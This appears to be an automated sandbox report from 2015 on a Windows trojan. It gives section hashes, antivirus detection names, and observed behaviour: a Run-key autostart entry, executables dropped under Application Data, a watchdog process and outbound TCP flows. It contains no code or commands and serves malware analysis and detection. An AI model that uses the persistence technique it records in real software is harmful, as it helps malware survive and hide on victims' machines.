Analysis Date: 2015-01-08 16:38:35

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 0c78c772b256ba90da4d4c5b710dbf4a sha1: 60ec23ea69b1002e5ac1490ed9721bbba4ef8e42 size: 295936
Section .rdata: md5: 5de8123eefa46dbacc5d9dd999c53985 sha1: 8bd23bf667f7e165072656af737cfc22f9b4723c size: 35328
Section (name missing in report): md5: b069f64e175e2c386aa0b9440102f961 sha1: c37f8a92585c635154286b67c14069be2203553d size: 100864
Timestamp: 2014-07-24 05:01:40
Packer: Microsoft Visual C++ ?.?
AV 360 Safe: no_virus
AV Alwil (avast): Downloader-TLD [Trj]
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV Avira (antivir): BDS/Zegost.Gen4
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Dr. Web: no_virus
AV Eset (nod32): Win32/Agent.VNC
AV Frisk (f-prot): no_virus
AV Grisoft (avg): Win32/Cryptor
AV K7: Unwanted-Program ( 004a8e8a1 )
AV Microsoft Security Essentials: Trojan:Win32/Dynamer!ac
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Detection Resource Visual Logs Config Card Color ➝ C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe

↳ C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\annaqler.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.gjv
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\oyayzcclrafmvj\remojjf.exe"

Network Details:

DNS query Type: A
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝
Flows TCP: 192.168.1.1:1036 ➝
Flows TCP: 192.168.1.1:1037 ➝

Raw Pcap

